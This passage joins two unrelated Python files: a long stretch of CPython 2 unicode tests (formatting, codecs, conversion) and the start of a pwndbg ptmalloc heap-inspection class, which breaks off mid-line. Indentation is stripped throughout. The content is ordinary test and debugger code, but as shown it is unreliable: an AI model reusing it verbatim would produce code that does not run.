self.assert_('a' in u'\0abc')
self.assert_(u'a' in u'\0abc')
self.assert_(u'asdf' in 'asdf')
self.assert_('asdf' in u'asdf')
self.assert_(u'asdf' in u'asdf')
self.assert_(u'asdf' not in 'asd')
self.assert_('asdf' not in u'asd')
self.assert_(u'asdf' not in u'asd')
self.assert_(u'asdf' not in '')
self.assert_('asdf' not in u'')
self.assert_(u'asdf' not in u'')
self.assertRaises(TypeError, u"abc".__contains__)
def test_formatting(self):
string_tests.MixinStrUnicodeUserStringTest.test_formatting(self)
# Testing Unicode formatting strings...
self.assertEqual(u"%s, %s" % (u"abc", "abc"), u'abc, abc')
self.assertEqual(u"%s, %s, %i, %f, %5.2f" % (u"abc", "abc", 1, 2, 3), u'abc, abc, 1, 2.000000, 3.00')
self.assertEqual(u"%s, %s, %i, %f, %5.2f" % (u"abc", "abc", 1, -2, 3), u'abc, abc, 1, -2.000000, 3.00')
self.assertEqual(u"%s, %s, %i, %f, %5.2f" % (u"abc", "abc", -1, -2, 3.5), u'abc, abc, -1, -2.000000, 3.50')
self.assertEqual(u"%s, %s, %i, %f, %5.2f" % (u"abc", "abc", -1, -2, 3.57), u'abc, abc, -1, -2.000000, 3.57')
self.assertEqual(u"%s, %s, %i, %f, %5.2f" % (u"abc", "abc", -1, -2, 1003.57), u'abc, abc, -1, -2.000000, 1003.57')
if not sys.platform.startswith('java'):
self.assertEqual(u"%r, %r" % (u"abc", "abc"), u"u'abc', 'abc'")
self.assertEqual(u"%(x)s, %(y)s" % {'x':u"abc", 'y':"def"}, u'abc, def')
self.assertEqual(u"%(x)s, %(\xfc)s" % {'x':u"abc", u'\xfc':"def"}, u'abc, def')
self.assertEqual(u'%c' % 0x1234, u'\u1234')
self.assertRaises(OverflowError, u"%c".__mod__, (sys.maxunicode+1,))
# formatting jobs delegated from the string implementation:
self.assertEqual('...%(foo)s...' % {'foo':u"abc"}, u'...abc...')
self.assertEqual('...%(foo)s...' % {'foo':"abc"}, '...abc...')
self.assertEqual('...%(foo)s...' % {u'foo':"abc"}, '...abc...')
self.assertEqual('...%(foo)s...' % {u'foo':u"abc"}, u'...abc...')
self.assertEqual('...%(foo)s...' % {u'foo':u"abc",'def':123}, u'...abc...')
self.assertEqual('...%(foo)s...' % {u'foo':u"abc",u'def':123}, u'...abc...')
self.assertEqual('...%s...%s...%s...%s...' % (1,2,3,u"abc"), u'...1...2...3...abc...')
self.assertEqual('...%%...%%s...%s...%s...%s...%s...' % (1,2,3,u"abc"), u'...%...%s...1...2...3...abc...')
self.assertEqual('...%s...' % u"abc", u'...abc...')
self.assertEqual('%*s' % (5,u'abc',), u' abc')
self.assertEqual('%*s' % (-5,u'abc',), u'abc ')
self.assertEqual('%*.*s' % (5,2,u'abc',), u' ab')
self.assertEqual('%*.*s' % (5,3,u'abc',), u' abc')
self.assertEqual('%i %*.*s' % (10, 5,3,u'abc',), u'10 abc')
self.assertEqual('%i%s %*.*s' % (10, 3, 5, 3, u'abc',), u'103 abc')
self.assertEqual('%c' % u'a', u'a')
class Wrapper:
def __str__(self):
return u'\u1234'
self.assertEqual('%s' % Wrapper(), u'\u1234')
@test_support.run_with_locale('LC_ALL', 'de_DE', 'fr_FR')
def test_format_float(self):
# should not format with a comma, but always with C locale
self.assertEqual(u'1.0', u'%.1f' % 1.0)
def test_constructor(self):
# unicode(obj) tests (this maps to PyObject_Unicode() at C level)
self.assertEqual(
unicode(u'unicode remains unicode'),
u'unicode remains unicode'
)
class UnicodeSubclass(unicode):
pass
self.assertEqual(
unicode(UnicodeSubclass('unicode subclass becomes unicode')),
u'unicode subclass becomes unicode'
)
self.assertEqual(
unicode('strings are converted to unicode'),
u'strings are converted to unicode'
)
class UnicodeCompat:
def __init__(self, x):
self.x = x
def __unicode__(self):
return self.x
self.assertEqual(
unicode(UnicodeCompat('__unicode__ compatible objects are recognized')),
u'__unicode__ compatible objects are recognized')
class StringCompat:
def __init__(self, x):
self.x = x
def __str__(self):
return self.x
self.assertEqual(
unicode(StringCompat('__str__ compatible objects are recognized')),
u'__str__ compatible objects are recognized'
)
# unicode(obj) is compatible to str():
o = StringCompat('unicode(obj) is compatible to str()')
self.assertEqual(unicode(o), u'unicode(obj) is compatible to str()')
self.assertEqual(str(o), 'unicode(obj) is compatible to str()')
# %-formatting and .__unicode__()
self.assertEqual(u'%s' %
UnicodeCompat(u"u'%s' % obj uses obj.__unicode__()"),
u"u'%s' % obj uses obj.__unicode__()")
self.assertEqual(u'%s' %
UnicodeCompat(u"u'%s' % obj falls back to obj.__str__()"),
u"u'%s' % obj falls back to obj.__str__()")
for obj in (123, 123.45, 123L):
self.assertEqual(unicode(obj), unicode(str(obj)))
# unicode(obj, encoding, error) tests (this maps to
# PyUnicode_FromEncodedObject() at C level)
if not sys.platform.startswith('java'):
self.assertRaises(
TypeError,
unicode,
u'decoding unicode is not supported',
'utf-8',
'strict'
)
self.assertEqual(
unicode('strings are decoded to unicode', 'utf-8', 'strict'),
u'strings are decoded to unicode'
)
if not sys.platform.startswith('java'):
self.assertEqual(
unicode(
buffer('character buffers are decoded to unicode'),
'utf-8',
'strict'
),
u'character buffers are decoded to unicode'
)
self.assertRaises(TypeError, unicode, 42, 42, 42)
def test_codecs_utf7(self):
utfTests = [
(u'A\u2262\u0391.', 'A+ImIDkQ.'), # RFC2152 example
(u'Hi Mom -\u263a-!', 'Hi Mom -+Jjo--!'), # RFC2152 example
(u'\u65E5\u672C\u8A9E', '+ZeVnLIqe-'), # RFC2152 example
(u'Item 3 is \u00a31.', 'Item 3 is +AKM-1.'), # RFC2152 example
(u'+', '+-'),
(u'+-', '+--'),
(u'+?', '+-?'),
(u'\?', '+AFw?'),
(u'+?', '+-?'),
(ur'\\?', '+AFwAXA?'),
(ur'\\\?', '+AFwAXABc?'),
(ur'++--', '+-+---')
]
for (x, y) in utfTests:
self.assertEqual(x.encode('utf-7'), y)
# surrogates not supported
self.assertRaises(UnicodeError, unicode, '+3ADYAA-', 'utf-7')
self.assertEqual(unicode('+3ADYAA-', 'utf-7', 'replace'), u'\ufffd')
# Issue #2242: crash on some Windows/MSVC versions
self.assertRaises(UnicodeDecodeError, '+\xc1'.decode, 'utf-7')
def test_codecs_utf8(self):
self.assertEqual(u''.encode('utf-8'), '')
self.assertEqual(u'\u20ac'.encode('utf-8'), '\xe2\x82\xac')
self.assertEqual(u'\ud800\udc02'.encode('utf-8'), '\xf0\x90\x80\x82')
self.assertEqual(u'\ud84d\udc56'.encode('utf-8'), '\xf0\xa3\x91\x96')
self.assertEqual(u'\ud800'.encode('utf-8'), '\xed\xa0\x80')
self.assertEqual(u'\udc00'.encode('utf-8'), '\xed\xb0\x80')
self.assertEqual(
(u'\ud800\udc02'*1000).encode('utf-8'),
'\xf0\x90\x80\x82'*1000
)
self.assertEqual(
u'\u6b63\u78ba\u306b\u8a00\u3046\u3068\u7ffb\u8a33\u306f'
u'\u3055\u308c\u3066\u3044\u307e\u305b\u3093\u3002\u4e00'
u'\u90e8\u306f\u30c9\u30a4\u30c4\u8a9e\u3067\u3059\u304c'
u'\u3001\u3042\u3068\u306f\u3067\u305f\u3089\u3081\u3067'
u'\u3059\u3002\u5b9f\u969b\u306b\u306f\u300cWenn ist das'
u' Nunstuck git und'.encode('utf-8'),
'\xe6\xad\xa3\xe7\xa2\xba\xe3\x81\xab\xe8\xa8\x80\xe3\x81'
'\x86\xe3\x81\xa8\xe7\xbf\xbb\xe8\xa8\xb3\xe3\x81\xaf\xe3'
'\x81\x95\xe3\x82\x8c\xe3\x81\xa6\xe3\x81\x84\xe3\x81\xbe'
'\xe3\x81\x9b\xe3\x82\x93\xe3\x80\x82\xe4\xb8\x80\xe9\x83'
'\xa8\xe3\x81\xaf\xe3\x83\x89\xe3\x82\xa4\xe3\x83\x84\xe8'
'\xaa\x9e\xe3\x81\xa7\xe3\x81\x99\xe3\x81\x8c\xe3\x80\x81'
'\xe3\x81\x82\xe3\x81\xa8\xe3\x81\xaf\xe3\x81\xa7\xe3\x81'
'\x9f\xe3\x82\x89\xe3\x82\x81\xe3\x81\xa7\xe3\x81\x99\xe3'
'\x80\x82\xe5\xae\x9f\xe9\x9a\x9b\xe3\x81\xab\xe3\x81\xaf'
'\xe3\x80\x8cWenn ist das Nunstuck git und'
)
# UTF-8 specific decoding tests
self.assertEqual(unicode('\xf0\xa3\x91\x96', 'utf-8'), u'\U00023456' )
self.assertEqual(unicode('\xf0\x90\x80\x82', 'utf-8'), u'\U00010002' )
self.assertEqual(unicode('\xe2\x82\xac', 'utf-8'), u'\u20ac' )
# Other possible utf-8 test cases:
# * strict decoding testing for all of the
# UTF8_ERROR cases in PyUnicode_DecodeUTF8
def test_codecs_idna(self):
# Test whether trailing dot is preserved
self.assertEqual(u"www.python.org.".encode("idna"), "www.python.org.")
def test_codecs_errors(self):
# Error handling (encoding)
self.assertRaises(UnicodeError, u'Andr\202 x'.encode, 'ascii')
self.assertRaises(UnicodeError, u'Andr\202 x'.encode, 'ascii','strict')
self.assertEqual(u'Andr\202 x'.encode('ascii','ignore'), "Andr x")
self.assertEqual(u'Andr\202 x'.encode('ascii','replace'), "Andr? x")
# Error handling (decoding)
self.assertRaises(UnicodeError, unicode, 'Andr\202 x', 'ascii')
self.assertRaises(UnicodeError, unicode, 'Andr\202 x', 'ascii','strict')
self.assertEqual(unicode('Andr\202 x','ascii','ignore'), u"Andr x")
self.assertEqual(unicode('Andr\202 x','ascii','replace'), u'Andr\uFFFD x')
# Error handling (unknown character names)
self.assertEqual("\\N{foo}xx".decode("unicode-escape", "ignore"), u"xx")
# Error handling (truncated escape sequence)
self.assertRaises(UnicodeError, "\\".decode, "unicode-escape")
self.assertRaises(TypeError, "hello".decode, "test.unicode1")
self.assertRaises(TypeError, unicode, "hello", "test.unicode2")
self.assertRaises(TypeError, u"hello".encode, "test.unicode1")
self.assertRaises(TypeError, u"hello".encode, "test.unicode2")
# executes PyUnicode_Encode()
import imp
self.assertRaises(
ImportError,
imp.find_module,
"non-existing module",
[u"non-existing dir"]
)
# Error handling (wrong arguments)
self.assertRaises(TypeError, u"hello".encode, 42, 42, 42)
# Error handling (PyUnicode_EncodeDecimal())
self.assertRaises(UnicodeError, int, u"\u0200")
def test_codecs(self):
# Encoding
self.assertEqual(u'hello'.encode('ascii'), 'hello')
self.assertEqual(u'hello'.encode('utf-7'), 'hello')
self.assertEqual(u'hello'.encode('utf-8'), 'hello')
self.assertEqual(u'hello'.encode('utf8'), 'hello')
self.assertEqual(u'hello'.encode('utf-16-le'), 'h\000e\000l\000l\000o\000')
self.assertEqual(u'hello'.encode('utf-16-be'), '\000h\000e\000l\000l\000o')
self.assertEqual(u'hello'.encode('latin-1'), 'hello')
# Roundtrip safety for BMP (just the first 1024 chars)
for c in xrange(1024):
u = unichr(c)
for encoding in ('utf-7', 'utf-8', 'utf-16', 'utf-16-le',
'utf-16-be', 'raw_unicode_escape',
'unicode_escape', 'unicode_internal'):
self.assertEqual(unicode(u.encode(encoding),encoding), u)
# Roundtrip safety for BMP (just the first 256 chars)
for c in xrange(256):
u = unichr(c)
for encoding in ('latin-1',):
self.assertEqual(unicode(u.encode(encoding),encoding), u)
# Roundtrip safety for BMP (just the first 128 chars)
for c in xrange(128):
u = unichr(c)
for encoding in ('ascii',):
self.assertEqual(unicode(u.encode(encoding),encoding), u)
# Roundtrip safety for non-BMP (just a few chars)
u = u'\U00010001\U00020002\U00030003\U00040004\U00050005'
for encoding in ('utf-8', 'utf-16', 'utf-16-le', 'utf-16-be',
#'raw_unicode_escape',
'unicode_escape', 'unicode_internal'):
self.assertEqual(unicode(u.encode(encoding),encoding), u)
# UTF-8 must be roundtrip safe for all UCS-2 code points
# This excludes surrogates: in the full range, there would be
# a surrogate pair (\udbff\udc00), which gets converted back
# to a non-BMP character (\U0010fc00)
u = u''.join(map(unichr, range(0,0xd800)+range(0xe000,0x10000)))
for encoding in ('utf-8',):
self.assertEqual(unicode(u.encode(encoding),encoding), u)
def test_codecs_charmap(self):
# 0-127
s = ''.join(map(chr, xrange(128)))
for encoding in (
'cp037', 'cp1026',
'cp437', 'cp500', 'cp737', 'cp775', 'cp850',
'cp852', 'cp855', 'cp860', 'cp861', 'cp862',
'cp863', 'cp865', 'cp866',
'iso8859_10', 'iso8859_13', 'iso8859_14', 'iso8859_15',
'iso8859_2', 'iso8859_3', 'iso8859_4', 'iso8859_5', 'iso8859_6',
'iso8859_7', 'iso8859_9', 'koi8_r', 'latin_1',
'mac_cyrillic', 'mac_latin2',
'cp1250', 'cp1251', 'cp1252', 'cp1253', 'cp1254', 'cp1255',
'cp1256', 'cp1257', 'cp1258',
'cp856', 'cp857', 'cp864', 'cp869', 'cp874',
'mac_greek', 'mac_iceland','mac_roman', 'mac_turkish',
'cp1006', 'iso8859_8',
### These have undefined mappings:
#'cp424',
### These fail the round-trip:
#'cp875'
):
self.assertEqual(unicode(s, encoding).encode(encoding), s)
# 128-255
s = ''.join(map(chr, xrange(128, 256)))
for encoding in (
'cp037', 'cp1026',
'cp437', 'cp500', 'cp737', 'cp775', 'cp850',
'cp852', 'cp855', 'cp860', 'cp861', 'cp862',
'cp863', 'cp865', 'cp866',
'iso8859_10', 'iso8859_13', 'iso8859_14', 'iso8859_15',
'iso8859_2', 'iso8859_4', 'iso8859_5',
'iso8859_9', 'koi8_r', 'latin_1',
'mac_cyrillic', 'mac_latin2',
### These have undefined mappings:
#'cp1250', 'cp1251', 'cp1252', 'cp1253', 'cp1254', 'cp1255',
#'cp1256', 'cp1257', 'cp1258',
#'cp424', 'cp856', 'cp857', 'cp864', 'cp869', 'cp874',
#'iso8859_3', 'iso8859_6', 'iso8859_7',
#'mac_greek', 'mac_iceland','mac_roman', 'mac_turkish',
### These fail the round-trip:
#'cp1006', 'cp875', 'iso8859_8',
):
self.assertEqual(unicode(s, encoding).encode(encoding), s)
def test_concatenation(self):
self.assertEqual((u"abc" u"def"), u"abcdef")
self.assertEqual(("abc" u"def"), u"abcdef")
self.assertEqual((u"abc" "def"), u"abcdef")
self.assertEqual((u"abc" u"def" "ghi"), u"abcdefghi")
self.assertEqual(("abc" "def" u"ghi"), u"abcdefghi")
def test_printing(self):
class BitBucket:
def write(self, text):
pass
out = BitBucket()
print >>out, u'abc'
print >>out, u'abc', u'def'
print >>out, u'abc', 'def'
print >>out, 'abc', u'def'
print >>out, u'abc\n'
print >>out, u'abc\n',
print >>out, u'abc\n',
print >>out, u'def\n'
print >>out, u'def\n'
def test_ucs4(self):
x = u'\U00100000'
y = x.encode("raw-unicode-escape").decode("raw-unicode-escape")
self.assertEqual(x, y)
y = r'\U00100000'
x = y.decode("raw-unicode-escape").encode("raw-unicode-escape")
self.assertEqual(x, y)
y = r'\U00010000'
x = y.decode("raw-unicode-escape").encode("raw-unicode-escape")
self.assertEqual(x, y)
try:
'\U11111111'.decode("raw-unicode-escape")
except UnicodeDecodeError as e:
self.assertEqual(e.start, 0)
self.assertEqual(e.end, 10)
else:
self.fail("Should have raised UnicodeDecodeError")
def test_conversion(self):
# Make sure __unicode__() works properly
class Foo0:
def __str__(self):
return "foo"
class Foo1:
def __unicode__(self):
return u"foo"
class Foo2(object):
def __unicode__(self):
return u"foo"
class Foo3(object):
def __unicode__(self):
return "foo"
class Foo4(str):
def __unicode__(self):
return "foo"
class Foo5(unicode):
def __unicode__(self):
return "foo"
class Foo6(str):
def __str__(self):
return "foos"
def __unicode__(self):
return u"foou"
class Foo7(unicode):
def __str__(self):
return "foos"
def __unicode__(self):
return u"foou"
class Foo8(unicode):
def __new__(cls, content=""):
return unicode.__new__(cls, 2*content)
def __unicode__(self):
return self
class Foo9(unicode):
def __str__(self):
return "string"
def __unicode__(self):
return "not unicode"
self.assertEqual(unicode(Foo0()), u"foo")
self.assertEqual(unicode(Foo1()), u"foo")
self.assertEqual(unicode(Foo2()), u"foo")
self.assertEqual(unicode(Foo3()), u"foo")
self.assertEqual(unicode(Foo4("bar")), u"foo")
self.assertEqual(unicode(Foo5("bar")), u"foo")
self.assertEqual(unicode(Foo6("bar")), u"foou")
self.assertEqual(unicode(Foo7("bar")), u"foou")
self.assertEqual(unicode(Foo8("foo")), u"foofoo")
self.assertEqual(str(Foo9("foo")), "string")
self.assertEqual(unicode(Foo9("foo")), u"not unicode")
def test_unicode_repr(self):
class s1:
def __repr__(self):
return '\\n'
class s2:
def __repr__(self):
return u'\\n'
self.assertEqual(repr(s1()), '\\n')
self.assertEqual(repr(s2()), '\\n')
def test_expandtabs_overflows_gracefully(self):
# This test only affects 32-bit platforms because expandtabs can only take
# an int as the max value, not a 64-bit C long. If expandtabs is changed
# to take a 64-bit long, this test should apply to all platforms.
if sys.maxint > (1 << 32) or struct.calcsize('P') != 4:
return
self.assertRaises(OverflowError, u't\tt\t'.expandtabs, sys.maxint)
def test__format__(self):
def test(value, format, expected):
# test both with and without the trailing 's'
self.assertEqual(value.__format__(format), expected)
self.assertEqual(value.__format__(format + u's'), expected)
test(u'', u'', u'')
test(u'abc', u'', u'abc')
test(u'abc', u'.3', u'abc')
test(u'ab', u'.3', u'ab')
test(u'abcdef', u'.3', u'abc')
test(u'abcdef', u'.0', u'')
test(u'abc', u'3.3', u'abc')
test(u'abc', u'2.3', u'abc')
test(u'abc', u'2.2', u'ab')
test(u'abc', u'3.2', u'ab ')
test(u'result', u'x<0', u'result')
test(u'result', u'x<5', u'result')
test(u'result', u'x<6', u'result')
test(u'result', u'x<7', u'resultx')
test(u'result', u'x<8', u'resultxx')
test(u'result', u' <7', u'result ')
test(u'result', u'<7', u'result ')
test(u'result', u'>7', u' result')
test(u'result', u'>8', u' result')
test(u'result', u'^8', u' result ')
test(u'result', u'^9', u' result ')
test(u'result', u'^10', u' result ')
test(u'a', u'10000', u'a' + u' ' * 9999)
test(u'', u'10000', u' ' * 10000)
test(u'', u'10000000', u' ' * 10000000)
# test mixing unicode and str
self.assertEqual(u'abc'.__format__('s'), u'abc')
self.assertEqual(u'abc'.__format__('->10s'), u'-------abc')
def test_format(self):
self.assertEqual(u''.format(), u'')
self.assertEqual(u'a'.format(), u'a')
self.assertEqual(u'ab'.format(), u'ab')
self.assertEqual(u'a{{'.format(), u'a{')
self.assertEqual(u'a}}'.format(), u'a}')
self.assertEqual(u'{{b'.format(), u'{b')
self.assertEqual(u'}}b'.format(), u'}b')
self.assertEqual(u'a{{b'.format(), u'a{b')
# examples from the PEP:
import datetime
self.assertEqual(u"My name is {0}".format(u'Fred'), u"My name is Fred")
self.assertEqual(u"My name is {0[name]}".format(dict(name=u'Fred')),
u"My name is Fred")
self.assertEqual(u"My name is {0} :-{{}}".format(u'Fred'),
u"My name is Fred :-{}")
# datetime.__format__ doesn't work with unicode
#d = datetime.date(2007, 8, 18)
#self.assertEqual("The year is {0.year}".format(d),
# "The year is 2007")
# classes we'll use for testing
class C:
def __init__(self, x=100):
self._x = x
def __format__(self, spec):
return spec
class D:
def __init__(self, x):
self.x = x
def __format__(self, spec):
return str(self.x)
# class with __str__, but no __format__
class E:
def __init__(self, x):
self.x = x
def __str__(self):
return u'E(' + self.x + u')'
# class with __repr__, but no __format__ or __str__
class F:
def __init__(self, x):
self.x = x
def __repr__(self):
return u'F(' + self.x + u')'
# class with __format__ that forwards to string, for some format_spec's
class G:
def __init__(self, x):
self.x = x
def __str__(self):
return u"string is " + self.x
def __format__(self, format_spec):
if format_spec == 'd':
return u'G(' + self.x + u')'
return object.__format__(self, format_spec)
# class that returns a bad type from __format__
class H:
def __format__(self, format_spec):
return 1.0
class I(datetime.date):
def __format__(self, format_spec):
return self.strftime(format_spec)
class J(int):
def __format__(self, format_spec):
return int.__format__(self * 2, format_spec)
self.assertEqual(u''.format(), u'')
self.assertEqual(u'abc'.format(), u'abc')
self.assertEqual(u'{0}'.format(u'abc'), u'abc')
self.assertEqual(u'{0:}'.format(u'abc'), u'abc')
self.assertEqual(u'X{0}'.format(u'abc'), u'Xabc')
self.assertEqual(u'{0}X'.format(u'abc'), u'abcX')
self.assertEqual(u'X{0}Y'.format(u'abc'), u'XabcY')
self.assertEqual(u'{1}'.format(1, u'abc'), u'abc')
self.assertEqual(u'X{1}'.format(1, u'abc'), u'Xabc')
self.assertEqual(u'{1}X'.format(1, u'abc'), u'abcX')
self.assertEqual(u'X{1}Y'.format(1, u'abc'), u'XabcY')
self.assertEqual(u'{0}'.format(-15), u'-15')
self.assertEqual(u'{0}{1}'.format(-15, u'abc'), u'-15abc')
self.assertEqual(u'{0}X{1}'.format(-15, u'abc'), u'-15Xabc')
self.assertEqual(u'{{'.format(), u'{')
self.assertEqual(u'}}'.format(), u'}')
self.assertEqual(u'{{}}'.format(), u'{}')
self.assertEqual(u'{{x}}'.format(), u'{x}')
self.assertEqual(u'{{{0}}}'.format(123), u'{123}')
self.assertEqual(u'{{{{0}}}}'.format(), u'{{0}}')
self.assertEqual(u'}}{{'.format(), u'}{')
self.assertEqual(u'}}x{{'.format(), u'}x{')
# weird field names
self.assertEqual(u"{0[foo-bar]}".format({u'foo-bar':u'baz'}), u'baz')
self.assertEqual(u"{0[foo bar]}".format({u'foo bar':u'baz'}), u'baz')
self.assertEqual(u"{0[ ]}".format({u' ':3}), u'3')
self.assertEqual(u'{foo._x}'.format(foo=C(20)), u'20')
self.assertEqual(u'{1}{0}'.format(D(10), D(20)), u'2010')
self.assertEqual(u'{0._x.x}'.format(C(D(u'abc'))), u'abc')
self.assertEqual(u'{0[0]}'.format([u'abc', u'def']), u'abc')
self.assertEqual(u'{0[1]}'.format([u'abc', u'def']), u'def')
self.assertEqual(u'{0[1][0]}'.format([u'abc', [u'def']]), u'def')
self.assertEqual(u'{0[1][0].x}'.format(['abc', [D(u'def')]]), u'def')
# strings
self.assertEqual(u'{0:.3s}'.format(u'abc'), u'abc')
self.assertEqual(u'{0:.3s}'.format(u'ab'), u'ab')
self.assertEqual(u'{0:.3s}'.format(u'abcdef'), u'abc')
self.assertEqual(u'{0:.0s}'.format(u'abcdef'), u'')
self.assertEqual(u'{0:3.3s}'.format(u'abc'), u'abc')
self.assertEqual(u'{0:2.3s}'.format(u'abc'), u'abc')
self.assertEqual(u'{0:2.2s}'.format(u'abc'), u'ab')
self.assertEqual(u'{0:3.2s}'.format(u'abc'), u'ab ')
self.assertEqual(u'{0:x<0s}'.format(u'result'), u'result')
self.assertEqual(u'{0:x<5s}'.format(u'result'), u'result')
self.assertEqual(u'{0:x<6s}'.format(u'result'), u'result')
self.assertEqual(u'{0:x<7s}'.format(u'result'), u'resultx')
self.assertEqual(u'{0:x<8s}'.format(u'result'), u'resultxx')
self.assertEqual(u'{0: <7s}'.format(u'result'), u'result ')
self.assertEqual(u'{0:<7s}'.format(u'result'), u'result ')
self.assertEqual(u'{0:>7s}'.format(u'result'), u' result')
self.assertEqual(u'{0:>8s}'.format(u'result'), u' result')
self.assertEqual(u'{0:^8s}'.format(u'result'), u' result ')
self.assertEqual(u'{0:^9s}'.format(u'result'), u' result ')
self.assertEqual(u'{0:^10s}'.format(u'result'), u' result ')
self.assertEqual(u'{0:10000}'.format(u'a'), u'a' + u' ' * 9999)
self.assertEqual(u'{0:10000}'.format(u''), u' ' * 10000)
self.assertEqual(u'{0:10000000}'.format(u''), u' ' * 10000000)
# format specifiers for user defined type
self.assertEqual(u'{0:abc}'.format(C()), u'abc')
# !r and !s coersions
self.assertEqual(u'{0!s}'.format(u'Hello'), u'Hello')
self.assertEqual(u'{0!s:}'.format(u'Hello'), u'Hello')
self.assertEqual(u'{0!s:15}'.format(u'Hello'), u'Hello ')
self.assertEqual(u'{0!s:15s}'.format(u'Hello'), u'Hello ')
self.assertEqual(u'{0!r}'.format(u'Hello'), u"u'Hello'")
self.assertEqual(u'{0!r:}'.format(u'Hello'), u"u'Hello'")
self.assertEqual(u'{0!r}'.format(F(u'Hello')), u'F(Hello)')
# test fallback to object.__format__
self.assertEqual(u'{0}'.format({}), u'{}')
self.assertEqual(u'{0}'.format([]), u'[]')
self.assertEqual(u'{0}'.format([1]), u'[1]')
self.assertEqual(u'{0}'.format(E(u'data')), u'E(data)')
self.assertEqual(u'{0:^10}'.format(E(u'data')), u' E(data) ')
self.assertEqual(u'{0:^10s}'.format(E(u'data')), u' E(data) ')
self.assertEqual(u'{0:d}'.format(G(u'data')), u'G(data)')
self.assertEqual(u'{0:>15s}'.format(G(u'data')), u' string is data')
self.assertEqual(u'{0!s}'.format(G(u'data')), u'string is data')
self.assertEqual("{0:date: %Y-%m-%d}".format(I(year=2007,
month=8,
day=27)),
"date: 2007-08-27")
# test deriving from a builtin type and overriding __format__
self.assertEqual("{0}".format(J(10)), "20")
# string format specifiers
self.assertEqual('{0:}'.format('a'), 'a')
# computed format specifiers
self.assertEqual("{0:.{1}}".format('hello world', 5), 'hello')
self.assertEqual("{0:.{1}s}".format('hello world', 5), 'hello')
self.assertEqual("{0:.{precision}s}".format('hello world', precision=5), 'hello')
self.assertEqual("{0:{width}.{precision}s}".format('hello world', width=10, precision=5), 'hello ')
self.assertEqual("{0:{width}.{precision}s}".format('hello world', width='10', precision='5'), 'hello ')
# test various errors
self.assertRaises(ValueError, '{'.format)
self.assertRaises(ValueError, '}'.format)
self.assertRaises(ValueError, 'a{'.format)
self.assertRaises(ValueError, 'a}'.format)
self.assertRaises(ValueError, '{a'.format)
self.assertRaises(ValueError, '}a'.format)
self.assertRaises(IndexError, '{0}'.format)
self.assertRaises(IndexError, '{1}'.format, 'abc')
self.assertRaises(KeyError, '{x}'.format)
self.assertRaises(ValueError, "}{".format)
self.assertRaises(ValueError, "{".format)
self.assertRaises(ValueError, "}".format)
self.assertRaises(ValueError, "abc{0:{}".format)
self.assertRaises(ValueError, "{0".format)
self.assertRaises(IndexError, "{0.}".format)
self.assertRaises(ValueError, "{0.}".format, 0)
self.assertRaises(IndexError, "{0[}".format)
self.assertRaises(ValueError, "{0[}".format, [])
self.assertRaises(KeyError, "{0]}".format)
self.assertRaises(ValueError, "{0.[]}".format, 0)
self.assertRaises(ValueError, "{0..foo}".format, 0)
self.assertRaises(ValueError, "{0[0}".format, 0)
self.assertRaises(ValueError, "{0[0:foo}".format, 0)
self.assertRaises(KeyError, "{c]}".format)
self.assertRaises(ValueError, "{{ {{{0}}".format, 0)
self.assertRaises(ValueError, "{0}}".format, 0)
self.assertRaises(KeyError, "{foo}".format, bar=3)
self.assertRaises(ValueError, "{0!x}".format, 3)
self.assertRaises(ValueError, "{0!}".format, 0)
self.assertRaises(ValueError, "{0!rs}".format, 0)
self.assertRaises(ValueError, "{!}".format)
self.assertRaises(ValueError, "{:}".format)
self.assertRaises(ValueError, "{:s}".format)
self.assertRaises(ValueError, "{}".format)
# can't have a replacement on the field name portion
self.assertRaises(TypeError, '{0[{1}]}'.format, 'abcdefg', 4)
# exceed maximum recursion depth
self.assertRaises(ValueError, "{0:{1:{2}}}".format, 'abc', 's', '')
self.assertRaises(ValueError, "{0:{1:{2:{3:{4:{5:{6}}}}}}}".format,
0, 1, 2, 3, 4, 5, 6, 7)
# string format spec errors
self.assertRaises(ValueError, "{0:-s}".format, '')
self.assertRaises(ValueError, format, "", "-")
self.assertRaises(ValueError, "{0:=s}".format, '')
# test combining string and unicode
self.assertEqual(u"foo{0}".format('bar'), u'foobar')
# This will try to convert the argument from unicode to str, which
# will succeed
self.assertEqual("foo{0}".format(u'bar'), 'foobar')
# This will try to convert the argument from unicode to str, which
# will fail
self.assertRaises(UnicodeEncodeError, "foo{0}".format, u'\u1000bar')
def test_raiseMemError(self):
# Ensure that the freelist contains a consistent object, even
# when a string allocation fails with a MemoryError.
# This used to crash the interpreter,
# or leak references when the number was smaller.
charwidth = 4 if sys.maxunicode >= 0x10000 else 2
# Note: sys.maxsize is half of the actual max allocation because of
# the signedness of Py_ssize_t.
alloc = lambda: u"a" * (sys.maxsize // charwidth * 2)
self.assertRaises(MemoryError, alloc)
self.assertRaises(MemoryError, alloc)
def test_main():
test_support.run_unittest(__name__)
if __name__ == "__main__":
test_main()
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from collections import OrderedDict
import gdb
import pwndbg.events
import pwndbg.typeinfo
from pwndbg.color import bold
from pwndbg.color import red
from pwndbg.constants import ptmalloc
class Heap(pwndbg.heap.heap.BaseHeap):
def __init__(self):
# Global ptmalloc objects
self._main_arena = None
self._mp = None
@property
def main_arena(self):
main_arena_addr = pwndbg.symbol.address('main_arena')
if main_arena_addr is not None:
self._main_arena = pwndbg.memory.poi(self.malloc_state, main_arena_addr)
else:
print(bold(red('Symbol \'main arena\' not found. Try installing libc '
'debugging symbols and try again.')))
return self._main_arena
@property
def mp(self):
mp_addr = pwndbg.symbol.address('mp_')
if mp_addr is not None:
self._mp = pwndbg.memory.poi(self.malloc_par, mp_addr)
return self._mp
@property
def global_max_fast(self):
return pwndbg.symbol.address('global_max_fast')
@property
@pwndbg.memoize.reset_on_objfile
def malloc_chunk(self):
return pwndbg.typeinfo.load('struct malloc_chunk')
@property
@pwndbg.memoize.reset_on_objfile
def malloc_state(self):
return pwndbg.typeinfo.load('struct malloc_state')
@property
@pwndbg.memoize.reset_on_objfile
def mallinfo(self):
return pwndbg.typeinfo.load('struct mallinfo')
@property
@pwndbg.memoize.reset_on_objfile
def malloc_par(self):
return pwndbg.typeinfo.load('struct malloc_par')
@property
@pwndbg.memoize.reset_on_objfile
def malloc_alignment(self):
return pwndbg.arch.ptrsize * 2
@property
@pwndbg.memoize.reset_on_objfile
def min_chunk_size(self):
return pwndbg.arch.ptrsize * 4
def _spaces_table(self):
spaces_table = [ pwndbg.arch.ptrsize * 2 ] * 64 \
+ [ pow(2, 6) ] * 32 \
+ [ pow(2, 9) ] * 16 \
